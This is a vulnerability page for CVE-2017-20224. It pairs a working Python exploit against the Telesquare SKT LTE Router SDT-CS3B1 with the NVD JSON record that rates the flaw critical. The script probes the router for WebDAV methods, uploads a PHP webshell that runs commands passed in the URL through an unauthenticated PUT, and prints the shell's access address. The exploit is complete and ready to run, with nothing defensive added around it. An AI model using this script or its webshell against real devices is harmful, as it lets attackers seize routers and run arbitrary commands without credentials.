CVE-2017-20224

#!/usr/bin/env python3 """ CVE-2017-20224 PoC - Telesquare SKT LTE Router SDT-CS3B1 Arbitrary File Upload Target: Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 Vulnerability: WebDAV arbitrary file upload via PUT method """ import requests import sys def upload_shell(target_ip, target_port=80): """ Upload a PHP webshell to the target router via WebDAV PUT method """ # PHP webshell content webshell = b'<?php system($_GET["cmd"]); ?>' # Target URL with WebDAV enabled path url = f"http://{target_ip}:{target_port}/webdav/shell.php" # HTTP headers for WebDAV PUT request headers = { 'Content-Type': 'application/octet-stream', 'Destination': 'http://target/webdav/shell.php' } print(f"[*] Attempting to upload webshell to {url}") try: # Send PUT request to upload the webshell response = requests.put(url, data=webshell, headers=headers, timeout=10) if response.status_code in [201, 204]: print("[+] Webshell uploaded successfully!") print(f"[+] Access shell at: http://{target_ip}:{target_port}/webdav/shell.php?cmd=whoami") return True else: print(f"[-] Upload failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def check_webdav(target_ip, target_port=80): """ Check if WebDAV methods are enabled on the target """ url = f"http://{target_ip}:{target_port}/" print(f"[*] Checking WebDAV support on {url}") # Check OPTIONS to see allowed methods try: response = requests.options(url, timeout=10) allowed_methods = response.headers.get('Allow', 'Not specified') print(f"[*] Allowed methods: {allowed_methods}") if 'PUT' in allowed_methods or 'PROPFIND' in allowed_methods: print("[+] WebDAV methods are enabled - target may be vulnerable") return True else: print("[-] WebDAV methods not detected") return False except requests.exceptions.RequestException as e: print(f"[-] Check failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") print(f"Example: {sys.argv[0]} 192.168.1.1 80") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 # First check if target is vulnerable if check_webdav(target, port): # Attempt to upload webshell upload_shell(target, port)

{"cve": {"id": "CVE-2017-20224", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:52.560", "lastModified": "2026-04-14T16:52:32.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious content by exploiting enabled WebDAV HTTP methods. Attackers can use PUT, DELETE, MKCOL, MOVE, COPY, and PROPPATCH methods to upload executable code, delete files, or manipulate server content for remote code execution or denial of service."}, {"lang": "es", "value": "El router Telesquare SKT LTE SDT-CS3B1 versión 1.2.0 contiene una vulnerabilidad de carga arbitraria de archivos que permite a atacantes no autenticados cargar contenido malicioso explotando métodos HTTP WebDAV habilitados. Los atacantes pueden usar los métodos PUT, DELETE, MKCOL, MOVE, COPY y PROPPATCH para cargar código ejecutable, eliminar archivos o manipular el contenido del servidor para la ejecución remota de código o la denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1CB1EF95-F220-467F-903C-0727F5250CF2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "81DED0D5-BDBB-4310-BD2D-0F4ED27B274B"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017120301", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://www.vulncheck.com/advisories/telesquare-skt-lte-router-sdt-cs3b1-webdav-arbitrary-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5446.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}